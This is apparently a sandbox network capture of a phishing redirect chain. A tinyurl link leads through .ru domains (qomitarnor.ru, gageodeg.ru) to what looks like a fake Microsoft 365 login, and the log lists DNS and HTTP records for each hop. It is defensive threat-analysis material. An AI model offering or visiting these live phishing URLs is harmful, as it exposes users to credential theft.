                                                            Jan 15, 2025 17:02:03.466460943 CET5213953192.168.2.161.1.1.1
                                                            Jan 15, 2025 17:02:03.471308947 CET53545271.1.1.1192.168.2.16
                                                            Jan 15, 2025 17:02:03.471908092 CET53582231.1.1.1192.168.2.16
                                                            Jan 15, 2025 17:02:03.472894907 CET53559491.1.1.1192.168.2.16
                                                            Jan 15, 2025 17:02:03.473068953 CET53499881.1.1.1192.168.2.16
                                                            Jan 15, 2025 17:02:03.473299980 CET53521391.1.1.1192.168.2.16
                                                            Jan 15, 2025 17:02:03.473408937 CET53524031.1.1.1192.168.2.16
                                                            Jan 15, 2025 17:02:04.258769989 CET5467953192.168.2.161.1.1.1
                                                            Jan 15, 2025 17:02:04.258948088 CET5443853192.168.2.161.1.1.1
                                                            Jan 15, 2025 17:02:04.265584946 CET53546791.1.1.1192.168.2.16
                                                            Jan 15, 2025 17:02:04.266144991 CET53544381.1.1.1192.168.2.16
                                                            Jan 15, 2025 17:02:04.315924883 CET6363653192.168.2.161.1.1.1
                                                            Jan 15, 2025 17:02:04.316047907 CET5084553192.168.2.161.1.1.1
                                                            Jan 15, 2025 17:02:04.322458029 CET53508451.1.1.1192.168.2.16
                                                            Jan 15, 2025 17:02:04.322854042 CET53636361.1.1.1192.168.2.16
                                                            Jan 15, 2025 17:02:04.937383890 CET5494553192.168.2.161.1.1.1
                                                            Jan 15, 2025 17:02:04.937650919 CET6448353192.168.2.161.1.1.1
                                                            Jan 15, 2025 17:02:04.944040060 CET53549451.1.1.1192.168.2.16
                                                            Jan 15, 2025 17:02:04.944329977 CET5302253192.168.2.161.1.1.1
                                                            Jan 15, 2025 17:02:04.944674015 CET5820753192.168.2.161.1.1.1
                                                            Jan 15, 2025 17:02:04.944727898 CET53644831.1.1.1192.168.2.16
                                                            Jan 15, 2025 17:02:04.951400995 CET53530221.1.1.1192.168.2.16
                                                            Jan 15, 2025 17:02:04.951764107 CET53582071.1.1.1192.168.2.16
                                                            Jan 15, 2025 17:02:05.199090004 CET6430353192.168.2.161.1.1.1
                                                            Jan 15, 2025 17:02:05.199348927 CET6390053192.168.2.161.1.1.1
                                                            Jan 15, 2025 17:02:05.206113100 CET53639001.1.1.1192.168.2.16
                                                            Jan 15, 2025 17:02:05.206363916 CET53643031.1.1.1192.168.2.16
                                                            Jan 15, 2025 17:02:07.224780083 CET5382853192.168.2.161.1.1.1
                                                            Jan 15, 2025 17:02:07.224929094 CET5986653192.168.2.161.1.1.1
                                                            Jan 15, 2025 17:02:07.231497049 CET53598661.1.1.1192.168.2.16
                                                            Jan 15, 2025 17:02:07.231885910 CET53538281.1.1.1192.168.2.16
                                                            Jan 15, 2025 17:02:14.332690954 CET6262553192.168.2.161.1.1.1
                                                            Jan 15, 2025 17:02:14.332928896 CET4963653192.168.2.161.1.1.1
                                                            Jan 15, 2025 17:02:14.387581110 CET53626251.1.1.1192.168.2.16
                                                            Jan 15, 2025 17:02:14.424186945 CET53496361.1.1.1192.168.2.16
                                                            Jan 15, 2025 17:02:15.533261061 CET5337153192.168.2.161.1.1.1
                                                            Jan 15, 2025 17:02:15.533396959 CET6301353192.168.2.161.1.1.1
                                                            Jan 15, 2025 17:02:15.533706903 CET5204553192.168.2.161.1.1.1
                                                            Jan 15, 2025 17:02:15.533829927 CET6367553192.168.2.161.1.1.1
                                                            Jan 15, 2025 17:02:15.582854986 CET53630131.1.1.1192.168.2.16
                                                            Jan 15, 2025 17:02:15.626425982 CET53533711.1.1.1192.168.2.16
                                                            Jan 15, 2025 17:02:16.580882072 CET6316153192.168.2.161.1.1.1
                                                            Jan 15, 2025 17:02:16.581001997 CET5805453192.168.2.161.1.1.1
                                                            Jan 15, 2025 17:02:16.588558912 CET53580541.1.1.1192.168.2.16
                                                            Jan 15, 2025 17:02:18.583002090 CET53552931.1.1.1192.168.2.16
                                                            Jan 15, 2025 17:02:18.721165895 CET5476053192.168.2.161.1.1.1
                                                            Jan 15, 2025 17:02:18.721322060 CET5843853192.168.2.161.1.1.1
                                                            Jan 15, 2025 17:02:18.728462934 CET53584381.1.1.1192.168.2.16
                                                            Jan 15, 2025 17:02:19.849100113 CET6140253192.168.2.161.1.1.1
                                                            Jan 15, 2025 17:02:19.849329948 CET5713353192.168.2.161.1.1.1
                                                            Jan 15, 2025 17:02:24.803075075 CET53518731.1.1.1192.168.2.16
                                                            Jan 15, 2025 17:02:37.299206018 CET53565291.1.1.1192.168.2.16
                                                            Jan 15, 2025 17:02:59.772412062 CET53562631.1.1.1192.168.2.16
                                                            Jan 15, 2025 17:03:00.189519882 CET138138192.168.2.16192.168.2.255
                                                            Jan 15, 2025 17:03:00.348474026 CET53551801.1.1.1192.168.2.16
                                                            Jan 15, 2025 17:03:05.252963066 CET5044053192.168.2.161.1.1.1
                                                            Jan 15, 2025 17:03:05.253150940 CET6208053192.168.2.161.1.1.1
                                                            Jan 15, 2025 17:03:05.261998892 CET53620801.1.1.1192.168.2.16
                                                            Jan 15, 2025 17:03:05.262020111 CET53504401.1.1.1192.168.2.16
                                                            Jan 15, 2025 17:03:07.236088991 CET5475053192.168.2.161.1.1.1
                                                            Jan 15, 2025 17:03:07.236612082 CET5459553192.168.2.161.1.1.1
                                                            Jan 15, 2025 17:03:30.790621996 CET53499251.1.1.1192.168.2.16
                                                            TimestampSource IPDest IPChecksumCodeType
                                                            Jan 15, 2025 17:02:02.471688986 CET192.168.2.161.1.1.1c288(Port unreachable)Destination Unreachable
                                                            Jan 15, 2025 17:02:14.424267054 CET192.168.2.161.1.1.1c320(Port unreachable)Destination Unreachable
                                                            Jan 15, 2025 17:02:19.964808941 CET192.168.2.161.1.1.1c2c0(Port unreachable)Destination Unreachable
                                                            Jan 15, 2025 17:03:02.899079084 CET192.168.2.161.1.1.1c288(Port unreachable)Destination Unreachable
                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Jan 15, 2025 17:02:01.275017023 CET192.168.2.161.1.1.10xa201Standard query (0)tinyurl.comA (IP address)IN (0x0001)false
                                                            Jan 15, 2025 17:02:01.275299072 CET192.168.2.161.1.1.10x6349Standard query (0)tinyurl.com65IN (0x0001)false
                                                            Jan 15, 2025 17:02:02.370767117 CET192.168.2.161.1.1.10x64f7Standard query (0)mstn.qomitarnor.ruA (IP address)IN (0x0001)false
                                                            Jan 15, 2025 17:02:02.370918989 CET192.168.2.161.1.1.10x464bStandard query (0)mstn.qomitarnor.ru65IN (0x0001)false
                                                            Jan 15, 2025 17:02:03.464787960 CET192.168.2.161.1.1.10x664cStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                            Jan 15, 2025 17:02:03.464988947 CET192.168.2.161.1.1.10xfa2aStandard query (0)code.jquery.com65IN (0x0001)false
                                                            Jan 15, 2025 17:02:03.465920925 CET192.168.2.161.1.1.10x3b21Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                            Jan 15, 2025 17:02:03.466073036 CET192.168.2.161.1.1.10x3cb1Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                            Jan 15, 2025 17:02:03.466342926 CET192.168.2.161.1.1.10x77bdStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                            Jan 15, 2025 17:02:03.466460943 CET192.168.2.161.1.1.10xac4aStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                            Jan 15, 2025 17:02:04.258769989 CET192.168.2.161.1.1.10x1cf4Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                            Jan 15, 2025 17:02:04.258948088 CET192.168.2.161.1.1.10x3485Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                            Jan 15, 2025 17:02:04.315924883 CET192.168.2.161.1.1.10xaa65Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                            Jan 15, 2025 17:02:04.316047907 CET192.168.2.161.1.1.10xb58bStandard query (0)code.jquery.com65IN (0x0001)false
                                                            Jan 15, 2025 17:02:04.937383890 CET192.168.2.161.1.1.10x4a16Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                            Jan 15, 2025 17:02:04.937650919 CET192.168.2.161.1.1.10x57f9Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                            Jan 15, 2025 17:02:04.944329977 CET192.168.2.161.1.1.10xb0eeStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                            Jan 15, 2025 17:02:04.944674015 CET192.168.2.161.1.1.10xa505Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                            Jan 15, 2025 17:02:05.199090004 CET192.168.2.161.1.1.10x31d0Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                            Jan 15, 2025 17:02:05.199348927 CET192.168.2.161.1.1.10x13a4Standard query (0)www.google.com65IN (0x0001)false
                                                            Jan 15, 2025 17:02:07.224780083 CET192.168.2.161.1.1.10x87beStandard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                            Jan 15, 2025 17:02:07.224929094 CET192.168.2.161.1.1.10x5d28Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                            Jan 15, 2025 17:02:14.332690954 CET192.168.2.161.1.1.10x58a9Standard query (0)1bs2v15ppr89kekrsavtxocgo0lfxist9p8hjkzcdxzqciopnn3nfaisiu.gageodeg.ruA (IP address)IN (0x0001)false
                                                            Jan 15, 2025 17:02:14.332928896 CET192.168.2.161.1.1.10xf042Standard query (0)1bs2v15ppr89kekrsavtxocgo0lfxist9p8hjkzcdxzqciopnn3nfaisiu.gageodeg.ru65IN (0x0001)false
                                                            Jan 15, 2025 17:02:15.533261061 CET192.168.2.161.1.1.10x6497Standard query (0)1bs2v15ppr89kekrsavtxocgo0lfxist9p8hjkzcdxzqciopnn3nfaisiu.gageodeg.ruA (IP address)IN (0x0001)false
                                                            Jan 15, 2025 17:02:15.533396959 CET192.168.2.161.1.1.10xcb41Standard query (0)1bs2v15ppr89kekrsavtxocgo0lfxist9p8hjkzcdxzqciopnn3nfaisiu.gageodeg.ru65IN (0x0001)false
                                                            Jan 15, 2025 17:02:15.533706903 CET192.168.2.161.1.1.10x85adStandard query (0)login.microsoftonline.comA (IP address)IN (0x0001)false
                                                            Jan 15, 2025 17:02:15.533829927 CET192.168.2.161.1.1.10x57b0Standard query (0)login.microsoftonline.com65IN (0x0001)false
                                                            Jan 15, 2025 17:02:16.580882072 CET192.168.2.161.1.1.10x6a74Standard query (0)www.office.comA (IP address)IN (0x0001)false
                                                            Jan 15, 2025 17:02:16.581001997 CET192.168.2.161.1.1.10xccedStandard query (0)www.office.com65IN (0x0001)false
                                                            Jan 15, 2025 17:02:18.721165895 CET192.168.2.161.1.1.10x54f1Standard query (0)www.office.comA (IP address)IN (0x0001)false
                                                            Jan 15, 2025 17:02:18.721322060 CET192.168.2.161.1.1.10x4387Standard query (0)www.office.com65IN (0x0001)false
                                                            Jan 15, 2025 17:02:19.849100113 CET192.168.2.161.1.1.10x719cStandard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                            Jan 15, 2025 17:02:19.849329948 CET192.168.2.161.1.1.10x2c00Standard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                            Jan 15, 2025 17:03:05.252963066 CET192.168.2.161.1.1.10x65f9Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                            Jan 15, 2025 17:03:05.253150940 CET192.168.2.161.1.1.10x95bStandard query (0)www.google.com65IN (0x0001)false
                                                            Jan 15, 2025 17:03:07.236088991 CET192.168.2.161.1.1.10x5e70Standard query (0)identity.nel.measure.office.netA (IP address)IN (0x0001)false
                                                            Jan 15, 2025 17:03:07.236612082 CET192.168.2.161.1.1.10x4cabStandard query (0)identity.nel.measure.office.net65IN (0x0001)false
                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Jan 15, 2025 17:02:01.281877041 CET1.1.1.1192.168.2.160xa201No error (0)tinyurl.com104.17.112.233A (IP address)IN (0x0001)false
                                                            Jan 15, 2025 17:02:01.281877041 CET1.1.1.1192.168.2.160xa201No error (0)tinyurl.com104.18.111.161A (IP address)IN (0x0001)false
                                                            Jan 15, 2025 17:02:01.284106016 CET1.1.1.1192.168.2.160x6349No error (0)tinyurl.com65IN (0x0001)false
                                                            Jan 15, 2025 17:02:02.421474934 CET1.1.1.1192.168.2.160x64f7No error (0)mstn.qomitarnor.ru188.114.96.3A (IP address)IN (0x0001)false
                                                            Jan 15, 2025 17:02:02.421474934 CET1.1.1.1192.168.2.160x64f7No error (0)mstn.qomitarnor.ru188.114.97.3A (IP address)IN (0x0001)false
                                                            Jan 15, 2025 17:02:02.471623898 CET1.1.1.1192.168.2.160x464bNo error (0)mstn.qomitarnor.ru65IN (0x0001)false
                                                            Jan 15, 2025 17:02:03.471308947 CET1.1.1.1192.168.2.160x664cNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                            Jan 15, 2025 17:02:03.471308947 CET1.1.1.1192.168.2.160x664cNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                            Jan 15, 2025 17:02:03.471308947 CET1.1.1.1192.168.2.160x664cNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                            Jan 15, 2025 17:02:03.471308947 CET1.1.1.1192.168.2.160x664cNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                            Jan 15, 2025 17:02:03.472894907 CET1.1.1.1192.168.2.160x3b21No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                            Jan 15, 2025 17:02:03.472894907 CET1.1.1.1192.168.2.160x3b21No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                            Jan 15, 2025 17:02:03.473068953 CET1.1.1.1192.168.2.160x77bdNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                            Jan 15, 2025 17:02:03.473068953 CET1.1.1.1192.168.2.160x77bdNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                            Jan 15, 2025 17:02:03.473299980 CET1.1.1.1192.168.2.160xac4aNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                            Jan 15, 2025 17:02:03.473408937 CET1.1.1.1192.168.2.160x3cb1No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                            Jan 15, 2025 17:02:04.265584946 CET1.1.1.1192.168.2.160x1cf4No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                            Jan 15, 2025 17:02:04.265584946 CET1.1.1.1192.168.2.160x1cf4No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                            Jan 15, 2025 17:02:04.266144991 CET1.1.1.1192.168.2.160x3485No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                            Jan 15, 2025 17:02:04.322854042 CET1.1.1.1192.168.2.160xaa65No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                            Jan 15, 2025 17:02:04.322854042 CET1.1.1.1192.168.2.160xaa65No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                            Jan 15, 2025 17:02:04.322854042 CET1.1.1.1192.168.2.160xaa65No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                            Jan 15, 2025 17:02:04.322854042 CET1.1.1.1192.168.2.160xaa65No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                            Jan 15, 2025 17:02:04.944040060 CET1.1.1.1192.168.2.160x4a16No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                            Jan 15, 2025 17:02:04.944040060 CET1.1.1.1192.168.2.160x4a16No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                            Jan 15, 2025 17:02:04.944727898 CET1.1.1.1192.168.2.160x57f9No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                            Jan 15, 2025 17:02:04.951400995 CET1.1.1.1192.168.2.160xb0eeNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                            Jan 15, 2025 17:02:04.951400995 CET1.1.1.1192.168.2.160xb0eeNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                            Jan 15, 2025 17:02:04.951764107 CET1.1.1.1192.168.2.160xa505No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                            Jan 15, 2025 17:02:05.206113100 CET1.1.1.1192.168.2.160x13a4No error (0)www.google.com65IN (0x0001)false
                                                            Jan 15, 2025 17:02:05.206363916 CET1.1.1.1192.168.2.160x31d0No error (0)www.google.com142.250.185.132A (IP address)IN (0x0001)false
                                                            Jan 15, 2025 17:02:07.231885910 CET1.1.1.1192.168.2.160x87beNo error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                            Jan 15, 2025 17:02:14.387581110 CET1.1.1.1192.168.2.160x58a9No error (0)1bs2v15ppr89kekrsavtxocgo0lfxist9p8hjkzcdxzqciopnn3nfaisiu.gageodeg.ru104.21.48.1A (IP address)IN (0x0001)false
                                                            Jan 15, 2025 17:02:14.387581110 CET1.1.1.1192.168.2.160x58a9No error (0)1bs2v15ppr89kekrsavtxocgo0lfxist9p8hjkzcdxzqciopnn3nfaisiu.gageodeg.ru104.21.32.1A (IP address)IN (0x0001)false
                                                            Jan 15, 2025 17:02:14.387581110 CET1.1.1.1192.168.2.160x58a9No error (0)1bs2v15ppr89kekrsavtxocgo0lfxist9p8hjkzcdxzqciopnn3nfaisiu.gageodeg.ru104.21.64.1A (IP address)IN (0x0001)false
                                                            Jan 15, 2025 17:02:14.387581110 CET1.1.1.1192.168.2.160x58a9No error (0)1bs2v15ppr89kekrsavtxocgo0lfxist9p8hjkzcdxzqciopnn3nfaisiu.gageodeg.ru104.21.80.1A (IP address)IN (0x0001)false
                                                            Jan 15, 2025 17:02:14.387581110 CET1.1.1.1192.168.2.160x58a9No error (0)1bs2v15ppr89kekrsavtxocgo0lfxist9p8hjkzcdxzqciopnn3nfaisiu.gageodeg.ru104.21.112.1A (IP address)IN (0x0001)false
                                                            Jan 15, 2025 17:02:14.387581110 CET1.1.1.1192.168.2.160x58a9No error (0)1bs2v15ppr89kekrsavtxocgo0lfxist9p8hjkzcdxzqciopnn3nfaisiu.gageodeg.ru104.21.16.1A (IP address)IN (0x0001)false
                                                            Jan 15, 2025 17:02:14.387581110 CET1.1.1.1192.168.2.160x58a9No error (0)1bs2v15ppr89kekrsavtxocgo0lfxist9p8hjkzcdxzqciopnn3nfaisiu.gageodeg.ru104.21.96.1A (IP address)IN (0x0001)false
                                                            Jan 15, 2025 17:02:14.424186945 CET1.1.1.1192.168.2.160xf042No error (0)1bs2v15ppr89kekrsavtxocgo0lfxist9p8hjkzcdxzqciopnn3nfaisiu.gageodeg.ru65IN (0x0001)false
                                                            Jan 15, 2025 17:02:15.540266991 CET1.1.1.1192.168.2.160x85adNo error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                            Jan 15, 2025 17:02:15.540565968 CET1.1.1.1192.168.2.160x57b0No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                            Jan 15, 2025 17:02:15.582854986 CET1.1.1.1192.168.2.160xcb41No error (0)1bs2v15ppr89kekrsavtxocgo0lfxist9p8hjkzcdxzqciopnn3nfaisiu.gageodeg.ru65IN (0x0001)false
                                                            Jan 15, 2025 17:02:15.626425982 CET1.1.1.1192.168.2.160x6497No error (0)1bs2v15ppr89kekrsavtxocgo0lfxist9p8hjkzcdxzqciopnn3nfaisiu.gageodeg.ru104.21.112.1A (IP address)IN (0x0001)false
                                                            Jan 15, 2025 17:02:15.626425982 CET1.1.1.1192.168.2.160x6497No error (0)1bs2v15ppr89kekrsavtxocgo0lfxist9p8hjkzcdxzqciopnn3nfaisiu.gageodeg.ru104.21.96.1A (IP address)IN (0x0001)false
                                                            Jan 15, 2025 17:02:15.626425982 CET1.1.1.1192.168.2.160x6497No error (0)1bs2v15ppr89kekrsavtxocgo0lfxist9p8hjkzcdxzqciopnn3nfaisiu.gageodeg.ru104.21.64.1A (IP address)IN (0x0001)false
                                                            Jan 15, 2025 17:02:15.626425982 CET1.1.1.1192.168.2.160x6497No error (0)1bs2v15ppr89kekrsavtxocgo0lfxist9p8hjkzcdxzqciopnn3nfaisiu.gageodeg.ru104.21.16.1A (IP address)IN (0x0001)false
                                                            Jan 15, 2025 17:02:15.626425982 CET1.1.1.1192.168.2.160x6497No error (0)1bs2v15ppr89kekrsavtxocgo0lfxist9p8hjkzcdxzqciopnn3nfaisiu.gageodeg.ru104.21.32.1A (IP address)IN (0x0001)false
                                                            Jan 15, 2025 17:02:15.626425982 CET1.1.1.1192.168.2.160x6497No error (0)1bs2v15ppr89kekrsavtxocgo0lfxist9p8hjkzcdxzqciopnn3nfaisiu.gageodeg.ru104.21.48.1A (IP address)IN (0x0001)false
                                                            Jan 15, 2025 17:02:15.626425982 CET1.1.1.1192.168.2.160x6497No error (0)1bs2v15ppr89kekrsavtxocgo0lfxist9p8hjkzcdxzqciopnn3nfaisiu.gageodeg.ru104.21.80.1A (IP address)IN (0x0001)false
                                                            Jan 15, 2025 17:02:16.588423014 CET1.1.1.1192.168.2.160x6a74No error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                            Jan 15, 2025 17:02:16.588423014 CET1.1.1.1192.168.2.160x6a74No error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                            Jan 15, 2025 17:02:16.588558912 CET1.1.1.1192.168.2.160xccedNo error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                            Jan 15, 2025 17:02:16.588558912 CET1.1.1.1192.168.2.160xccedNo error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                            Jan 15, 2025 17:02:17.768371105 CET1.1.1.1192.168.2.160x63eeNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                            Jan 15, 2025 17:02:17.768371105 CET1.1.1.1192.168.2.160x63eeNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                            Jan 15, 2025 17:02:18.689445019 CET1.1.1.1192.168.2.160x6288No error (0)shed.dual-low.s-part-0016.t-0009.t-msedge.nets-part-0016.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                            Jan 15, 2025 17:02:18.689445019 CET1.1.1.1192.168.2.160x6288No error (0)s-part-0016.t-0009.t-msedge.net13.107.246.44A (IP address)IN (0x0001)false
                                                            Jan 15, 2025 17:02:18.728302956 CET1.1.1.1192.168.2.160x54f1No error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                            Jan 15, 2025 17:02:18.728302956 CET1.1.1.1192.168.2.160x54f1No error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                            Jan 15, 2025 17:02:18.728462934 CET1.1.1.1192.168.2.160x4387No error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                            Jan 15, 2025 17:02:18.728462934 CET1.1.1.1192.168.2.160x4387No error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                            Jan 15, 2025 17:02:19.855943918 CET1.1.1.1192.168.2.160x719cNo error (0)aadcdn.msftauth.netwww.tm.aadcdn.msftauth.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                            Jan 15, 2025 17:02:19.857256889 CET1.1.1.1192.168.2.160x2c00No error (0)aadcdn.msftauth.netwww.tm.aadcdn.msftauth.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                            Jan 15, 2025 17:03:05.261998892 CET1.1.1.1192.168.2.160x95bNo error (0)www.google.com65IN (0x0001)false
                                                            Jan 15, 2025 17:03:05.262020111 CET1.1.1.1192.168.2.160x65f9No error (0)www.google.com216.58.206.36A (IP address)IN (0x0001)false
                                                            Jan 15, 2025 17:03:07.243417978 CET1.1.1.1192.168.2.160x5e70No error (0)identity.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                            Jan 15, 2025 17:03:07.244242907 CET1.1.1.1192.168.2.160x4cabNo error (0)identity.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                            • tinyurl.com
                                                            • mstn.qomitarnor.ru
                                                            • https:
                                                              • challenges.cloudflare.com
                                                              • code.jquery.com
                                                              • cdnjs.cloudflare.com
                                                              • 1bs2v15ppr89kekrsavtxocgo0lfxist9p8hjkzcdxzqciopnn3nfaisiu.gageodeg.ru
                                                            • a.nel.cloudflare.com
                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.1649712104.17.112.2334436356C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 16:02:02 UTC671OUTGET /Amconconstruction HTTP/1.1
                                                            Host: tinyurl.com
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            sec-ch-ua-platform: "Windows"
                                                            Upgrade-Insecure-Requests: 1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: navigate
                                                            Sec-Fetch-User: ?1
                                                            Sec-Fetch-Dest: document
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-15 16:02:02 UTC1233INHTTP/1.1 301 Moved Permanently
                                                            Date: Wed, 15 Jan 2025 16:02:02 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            location: https://mStn.qomitarnor.ru/JY1H/
                                                            referrer-policy: unsafe-url
                                                            x-robots-tag: noindex
                                                            x-tinyurl-redirect-type: redirect
                                                            Cache-Control: max-age=0, must-revalidate, no-cache, no-store, private
                                                            x-tinyurl-redirect: eyJpdiI6ImpEUk5zTUQwODJtZWZuRUZydkNnd2c9PSIsInZhbHVlIjoiZTIzMmVhT3JwTktYSjJEV2Y0L2Z6eUZUcmc0a095THl4RERVY0IwYmVvV0F3QTdhNVRJUkFTWVJDNnBndjM5WkJpTWJ0ZzQ5NVFSMzEyVkpPQmlWWWc9PSIsIm1hYyI6IjMyZmQzNDExYzYzMDkxMzhlMGEwOWU3YWNlNjA3ZjQ4N2JjODA2OTAxMDEwY2ZiM2ZhOTcwNjAwN2JjZmIwZmUiLCJ0YWciOiIifQ==
                                                            x-content-type-options: nosniff
                                                            x-xss-protection: 1; mode=block
                                                            CF-Cache-Status: HIT
                                                            Age: 600
                                                            Set-Cookie: __cf_bm=XGMc8gSYlyYJVpTAAK3Twz80NRkN6IUvHoOeCqHFXEk-1736956922-1.0.1.1-ZtuaBFsiGlAcGJbM40SJrETvriP2WHk60j0_8.wcUOHL4FYjqDivyqj4dMPn23QnxrFXWZZumHBYpm65oFi4cQ; path=/; expires=Wed, 15-Jan-25 16:32:02 GMT; domain=.tinyurl.com; HttpOnly; Secure; SameSite=None
                                                            Server-Timing: cfCacheStatus;desc="HIT"
                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                            Server: cloudflare
                                                            CF-RAY: 9027167c5ca18c2f-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2025-01-15 16:02:02 UTC136INData Raw: 33 34 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 73 3a 2f 2f 6d 53 74 6e 2e
                                                            Data Ascii: 34e<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='https://mStn.
